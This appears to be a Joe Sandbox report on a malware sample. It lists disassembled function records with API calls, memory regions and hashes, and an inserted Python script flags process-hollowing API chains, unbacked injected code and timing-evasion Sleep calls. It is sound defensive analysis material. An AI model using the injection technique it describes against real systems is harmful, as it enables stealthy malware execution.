                                                                      • Instruction ID: b635df9d833d12f77c00529528e7192ab7ec2c4e0f2bf7c288e20a1567fd8566
                                                                      • Opcode Fuzzy Hash: 65d9d11bd69c2c2ae4f27ccbb21c44ebad3fc2717612146412e7b0307d6f284a
                                                                      • Instruction Fuzzy Hash: C0329B35E00209EFDB24CF54C896FBEB7B9EF44354F14805AE915AB251C7B8AD81CB92
                                                                      APIs
                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 016E15E3
                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 016E1679
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 016E169B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1467271665.00000000016DF000.00000040.00000020.00020000.00000000.sdmp, Offset: 016DF000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_16df000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                      • String ID:
                                                                      • API String ID: 2438371351-0
                                                                      • Opcode ID: df6a772f5278f9eae63f3a29a40672dfa4321236305f3f5d8c91d224ff423281
                                                                      • Instruction ID: d62c54ef2d04186b07e8ba6175db9f09f0714475df0ecb5ed4e198f3e3b9b918
                                                                      • Opcode Fuzzy Hash: df6a772f5278f9eae63f3a29a40672dfa4321236305f3f5d8c91d224ff423281
                                                                      • Instruction Fuzzy Hash: DD12DE20A18658C6EB24DF64D8547DEB272FF68300F1091E9910DEB7A4E77A4F81CF5A
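The entry above is the one worth reading closely: CreateProcessW, Wow64GetThreadContext and ReadProcessMemory referenced from a single function whose memory-dump source is not backed by a PE image (offset 016DF000, "based on PE: false"), i.e. code that was unpacked or injected at runtime rather than loaded from the sample on disk. Checking each of these records by eye does not scale across a few hundred functions, so the following Python script, added here as an example and not part of the Joe Sandbox report or its IDA plugin, parses entries in exactly this layout (the bullet lines under "APIs", "Memory Dump Source" and "Similarity") and flags three things a triager looks for: a CreateProcess plus thread-context or remote-memory API chain in one function, functions recovered from unbacked memory, and Sleep calls with a hard-coded delay. The embedded sample is three entries transcribed from this section; the API name sets behind the hollowing heuristic are this example's own assumption, not Joe Sandbox signature logic.

```python
"""Triage helper for Joe Sandbox IDA-plugin function records (added example, not report tooling)."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# One line per API reference under "APIs"; the "Part of subcall function" prefix is optional.
API_RE = re.compile(
    r"^(?:•\s*)?(?P<sub>Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<name>\w+)\.(?P<mod>[A-Z0-9]+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)
SRC_RE = re.compile(r"Offset:\s*(?P<off>[0-9A-F]+),\s*based on PE:\s*(?P<pe>true|false)")
APIID_RE = re.compile(r"^(?:•\s*)?API ID:\s*(?P<id>.*)$")
FUZZY_RE = re.compile(r"^(?:•\s*)?Instruction Fuzzy Hash:\s*(?P<h>[0-9A-F]+)")

# Heuristic API sets for a process-hollowing chain (assumption of this example, not Joe Sandbox logic).
CREATE = {"CreateProcessW", "CreateProcessA", "CreateProcessInternalW"}
CONTEXT = {"GetThreadContext", "SetThreadContext", "Wow64GetThreadContext", "Wow64SetThreadContext"}
REMOTE_MEM = {"ReadProcessMemory", "WriteProcessMemory", "VirtualAllocEx", "NtUnmapViewOfSection", "ResumeThread"}

# Three entries transcribed from the report section above (constructed sample input for this script).
SAMPLE = """\
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 016E15E3
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 016E1679
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 016E169B
Memory Dump Source
• Source File: 00000000.00000002.1467271665.00000000016DF000.00000040.00000020.00020000.00000000.sdmp, Offset: 016DF000, based on PE: false
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• Instruction Fuzzy Hash: DD12DE20A18658C6EB24DF64D8547DEB272FF68300F1091E9910DEB7A4E77A4F81CF5A
APIs
• RtlAllocateHeap.NTDLL(00000000,?,00A91444,?,009DFDF5,?,?,009CA976,00000010,00A91440,009C13FC,?,009C13C6,?,009C1129), ref: 009F3852
Memory Dump Source
• Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
Similarity
• API ID: AllocateHeap
• Instruction Fuzzy Hash: C9E0E53110026CA6D62226B79D00BBB365CAB827F0F158121BE1596A80DB1DDD0183E0
APIs
• Sleep.KERNELBASE(000001F4), ref: 016E1E39
Memory Dump Source
• Source File: 00000000.00000002.1467271665.00000000016DF000.00000040.00000020.00020000.00000000.sdmp, Offset: 016DF000, based on PE: false
"""


@dataclass
class Record:
    apis: List[Tuple[str, str, List[str], str, bool]] = field(default_factory=list)  # name, module, args, ref, from subcall
    offset: str = ""
    pe_backed: Optional[bool] = None
    api_id: str = ""
    fuzzy: str = ""
    flags: List[str] = field(default_factory=list)


def parse(text: str) -> List[Record]:
    """Split report text into one Record per function entry."""
    records, cur = [], Record()
    for raw in text.splitlines():
        line = raw.strip()
        # A new entry starts at "APIs", or at "Memory Dump Source" when the current entry already has a source.
        if line == "APIs" or (line == "Memory Dump Source" and cur.offset):
            if cur.apis or cur.offset:
                records.append(cur)
            cur = Record()
            continue
        m = API_RE.match(line)
        if m:
            args = [a for a in (m["args"] or "").split(",") if a]
            cur.apis.append((m["name"], m["mod"], args, m["ref"], bool(m["sub"])))
            continue
        m = SRC_RE.search(line)
        if m and not cur.offset:
            cur.offset, cur.pe_backed = m["off"], m["pe"] == "true"
            continue
        m = APIID_RE.match(line)
        if m:
            cur.api_id = m["id"].strip()
            continue
        m = FUZZY_RE.match(line)
        if m:
            cur.fuzzy = m["h"]
    if cur.apis or cur.offset:
        records.append(cur)
    return records


def triage(text: str) -> List[Record]:
    """Parse the entries and attach triage flags to each one."""
    recs = parse(text)
    for r in recs:
        names = {a[0] for a in r.apis}
        if names & CREATE and names & (CONTEXT | REMOTE_MEM):
            chain = ", ".join(sorted(names & (CREATE | CONTEXT | REMOTE_MEM)))
            r.flags.append(f"process-hollowing chain: {chain}")
        if r.pe_backed is False:
            r.flags.append(f"code at {r.offset} is not backed by a PE image (unpacked or injected stage)")
        for name, _mod, args, ref, _sub in r.apis:
            # Sleep with a literal 8-hex-digit argument: fixed delay, a common sandbox timing trick.
            if name == "Sleep" and args and re.fullmatch(r"[0-9A-F]{8}", args[0]):
                r.flags.append(f"Sleep({int(args[0], 16)} ms) at {ref}: fixed delay, possible timing evasion")
    return recs


if __name__ == "__main__":
    for r in triage(SAMPLE):
        print(f"{r.offset} pe_backed={r.pe_backed} api_id={r.api_id!r}")
        for f in r.flags:
            print("   !", f)
```

Run against the full report text instead of SAMPLE and sort by offset: every flagged function at 016DF000 belongs to the same unbacked region, which is the stage to carve out of the memory dump and examine rather than the AutoIt runtime at 009C0000. The "Part of subcall function" bullets are kept but marked, so a function is not credited with a chain that only its callees perform.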
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                      • Instruction ID: 1856b2dcdb411be23b18188dab72f43381f7d78edbd8f8eea3e8ad1a42f6e07f
                                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                      • Instruction Fuzzy Hash: 21311574A40109DBC718CF69D4A2969F7A6FF49304B24C6A6E84ACB751D731EDD1CBC0
                                                                      APIs
                                                                        • Part of subcall function 009C4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,009C4EDD,?,00A91418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009C4E9C
                                                                        • Part of subcall function 009C4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 009C4EAE
                                                                        • Part of subcall function 009C4E90: FreeLibrary.KERNEL32(00000000,?,?,009C4EDD,?,00A91418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009C4EC0
                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00A91418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009C4EFD
                                                                        • Part of subcall function 009C4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00A03CDE,?,00A91418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009C4E62
                                                                        • Part of subcall function 009C4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 009C4E74
                                                                        • Part of subcall function 009C4E59: FreeLibrary.KERNEL32(00000000,?,?,00A03CDE,?,00A91418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009C4E87
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Load$AddressFreeProc
                                                                      • String ID:
                                                                      • API String ID: 2632591731-0
                                                                      • Opcode ID: a6f6b811c705559910791151f3e14effc66644c81fd299d8ad864d79610c1cb3
                                                                      • Instruction ID: a4d26a936b433b35caf3809a28a05c1141e6f4e8b18bfe53bf5b7e0ed8c420f3
                                                                      • Opcode Fuzzy Hash: a6f6b811c705559910791151f3e14effc66644c81fd299d8ad864d79610c1cb3
                                                                      • Instruction Fuzzy Hash: 29112332B00305AADF10FB60DC22FAD77A5AF84710F10882EF442A71C1EEB0AE459B52
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: __wsopen_s
                                                                      • String ID:
                                                                      • API String ID: 3347428461-0
                                                                      • Opcode ID: 89e349211f01354c326f8efc4dd79caca478ceb319e9648ca1544029531616e2
                                                                      • Instruction ID: 82d3bca0dc393ade09d53a9b32633d88d2bc5ad3f946b72b3696235e033f9e74
                                                                      • Opcode Fuzzy Hash: 89e349211f01354c326f8efc4dd79caca478ceb319e9648ca1544029531616e2
                                                                      • Instruction Fuzzy Hash: 6C111875A0410EAFCB05DF58E941AAF7BF9EF48314F144059F908AB312DB31DA21CBA5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                      • Instruction ID: 81f59679942a3fff2f9ba1dd77d2ad901eec2066ac72931f9ab5e44b76e656f4
                                                                      • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                      • Instruction Fuzzy Hash: 6DF0F432511A5896CA333B6B9C05B6B339C9FD2734F100B15F620932D2DB74EC0187A9
                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(00000000,?,00A91444,?,009DFDF5,?,?,009CA976,00000010,00A91440,009C13FC,?,009C13C6,?,009C1129), ref: 009F3852
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: cd67f8e9986730b79ee94305c1bee205a2a22169bc943e2d65795282f100027c
                                                                      • Instruction ID: cb60bbcab20059ec9b8df8cb91c5259969e833fd63556daf0c4e4cf28b020ab2
                                                                      • Opcode Fuzzy Hash: cd67f8e9986730b79ee94305c1bee205a2a22169bc943e2d65795282f100027c
                                                                      • Instruction Fuzzy Hash: C9E0E53110026CA6D62226B79D00BBB365CAB827F0F158121BE1596A80DB1DDD0183E0
                                                                      APIs
                                                                      • FreeLibrary.KERNEL32(?,?,00A91418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009C4F6D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLibrary
                                                                      • String ID:
                                                                      • API String ID: 3664257935-0
                                                                      • Opcode ID: 75212522800a4db5dbed0042195e5f38987af8eb17f50adaeb63062896c44fea
                                                                      • Instruction ID: f9085a4249be326744c756c956ca2bc74e24a8c5f72a646d65238c5a49f00eeb
                                                                      • Opcode Fuzzy Hash: 75212522800a4db5dbed0042195e5f38987af8eb17f50adaeb63062896c44fea
                                                                      • Instruction Fuzzy Hash: B5F03971A05752CFDB349F65D4A0E22BBE8BF143293208E7EE1EA82621CB359844DF51
                                                                      APIs
                                                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009C2DC4
                                                                        • Part of subcall function 009C6B57: _wcslen.LIBCMT ref: 009C6B6A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: LongNamePath_wcslen
                                                                      • String ID:
                                                                      • API String ID: 541455249-0
                                                                      • Opcode ID: 7c62105417c82fff15a050078eda3bab117e9eca0e75e385ce54907635e8a4e2
                                                                      • Instruction ID: 81130d36e5d43e7e52ed32135abf5e128a5d4c67661a296463a33e8f790c9176
                                                                      • Opcode Fuzzy Hash: 7c62105417c82fff15a050078eda3bab117e9eca0e75e385ce54907635e8a4e2
                                                                      • Instruction Fuzzy Hash: FDE0CD72A042245BC710E2989C05FDA77DDDFC8790F040075FD09E7248D960AD808551
                                                                      APIs
                                                                        • Part of subcall function 009C3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 009C3908
                                                                        • Part of subcall function 009CD730: GetInputState.USER32 ref: 009CD807
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 009C2B6B
                                                                        • Part of subcall function 009C30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 009C314E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                      • String ID:
                                                                      • API String ID: 3667716007-0
                                                                      • Opcode ID: 2cb0d400916fbf60e58d59a386615c58c750cdf69f424580adb9d08430c0b4c6
                                                                      • Instruction ID: d913f56003291fc7e0c99b96b4fe698ec79b30a8eba331cec3b9b7051e3104a5
                                                                      • Opcode Fuzzy Hash: 2cb0d400916fbf60e58d59a386615c58c750cdf69f424580adb9d08430c0b4c6
                                                                      • Instruction Fuzzy Hash: 38E08662B0434507CA04FB749856F7DB7599BD9361F40953EF146871A2CE2449478253
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(00000000,00000000,?,00A00704,?,?,00000000,?,00A00704,00000000,0000000C), ref: 00A003B7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: d0c96af602b3b42ea21f0b8b123e19a5e449e28ad2fcd324ef9661b22758d50e
                                                                      • Instruction ID: 7a7013bd8e8619ee63f63d5531ea2acce1084ae0fbf575596ee8625fcdae9d2c
                                                                      • Opcode Fuzzy Hash: d0c96af602b3b42ea21f0b8b123e19a5e449e28ad2fcd324ef9661b22758d50e
                                                                      • Instruction Fuzzy Hash: D8D06C3204020DBFDF028F84DD06EDA3BAAFB48714F014100BE1856020C732E822AB90
                                                                      APIs
                                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 009C1CBC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: InfoParametersSystem
                                                                      • String ID:
                                                                      • API String ID: 3098949447-0
                                                                      • Opcode ID: 52f3d63a0d82a3faf12fbe9cc7ac3ab51eb14286f90a340735dc5b676afb160c
                                                                      • Instruction ID: 8cf4dc8ad14e8c34ca6b48680a8c39a5f4434255fa68067e5bf8a86622928850
                                                                      • Opcode Fuzzy Hash: 52f3d63a0d82a3faf12fbe9cc7ac3ab51eb14286f90a340735dc5b676afb160c
                                                                      • Instruction Fuzzy Hash: 58C0483A3C0305AEE214CBD0AC4AF117764A348B15F448002F609A95E39AA22822EA50
                                                                      APIs
                                                                      • Sleep.KERNELBASE(000001F4), ref: 016E1E39
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1467271665.00000000016DF000.00000040.00000020.00020000.00000000.sdmp, Offset: 016DF000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_16df000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                      • Instruction ID: 6a2a17872f555c8f631528c15d0754513266645a1537841f425d93a0199b205d
                                                                      • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                      • Instruction Fuzzy Hash: DEE0BF7494120DEFDB00DFA4D94D6DE7BB4EF04701F1006A1FD05D7680DB309E549A62
                                                                      APIs
                                                                      • Sleep.KERNELBASE(000001F4), ref: 016E1E39
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1467271665.00000000016DF000.00000040.00000020.00020000.00000000.sdmp, Offset: 016DF000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_16df000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                      • Instruction ID: d8358a2679c19ecd8ff64a8dd6ec32f4d8104b152ade8180b4f6df970b159472
                                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                      • Instruction Fuzzy Hash: EBE0E67494120DDFDB00DFB4D94D6DE7BF4EF04701F100261FD01D2280D6309D509A62
                                                                      APIs
                                                                        • Part of subcall function 009D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 009D9BB2
                                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00A5961A
                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00A5965B
                                                                      • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00A5969F
                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A596C9
                                                                      • SendMessageW.USER32 ref: 00A596F2
                                                                      • GetKeyState.USER32(00000011), ref: 00A5978B
                                                                      • GetKeyState.USER32(00000009), ref: 00A59798
                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00A597AE
                                                                      • GetKeyState.USER32(00000010), ref: 00A597B8
                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A597E9
                                                                      • SendMessageW.USER32 ref: 00A59810
                                                                      • SendMessageW.USER32(?,00001030,?,00A57E95), ref: 00A59918
                                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00A5992E
                                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00A59941
                                                                      • SetCapture.USER32(?), ref: 00A5994A
                                                                      • ClientToScreen.USER32(?,?), ref: 00A599AF
                                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00A599BC
                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00A599D6
                                                                      • ReleaseCapture.USER32 ref: 00A599E1
                                                                      • GetCursorPos.USER32(?), ref: 00A59A19
                                                                      • ScreenToClient.USER32(?,?), ref: 00A59A26
                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00A59A80
                                                                      • SendMessageW.USER32 ref: 00A59AAE
                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00A59AEB
                                                                      • SendMessageW.USER32 ref: 00A59B1A
                                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00A59B3B
                                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00A59B4A
                                                                      • GetCursorPos.USER32(?), ref: 00A59B68
                                                                      • ScreenToClient.USER32(?,?), ref: 00A59B75
                                                                      • GetParent.USER32(?), ref: 00A59B93
                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00A59BFA
                                                                      • SendMessageW.USER32 ref: 00A59C2B
                                                                      • ClientToScreen.USER32(?,?), ref: 00A59C84
                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00A59CB4
                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00A59CDE
                                                                      • SendMessageW.USER32 ref: 00A59D01
                                                                      • ClientToScreen.USER32(?,?), ref: 00A59D4E
                                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00A59D82
                                                                        • Part of subcall function 009D9944: GetWindowLongW.USER32(?,000000EB), ref: 009D9952
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00A59E05
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                       • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
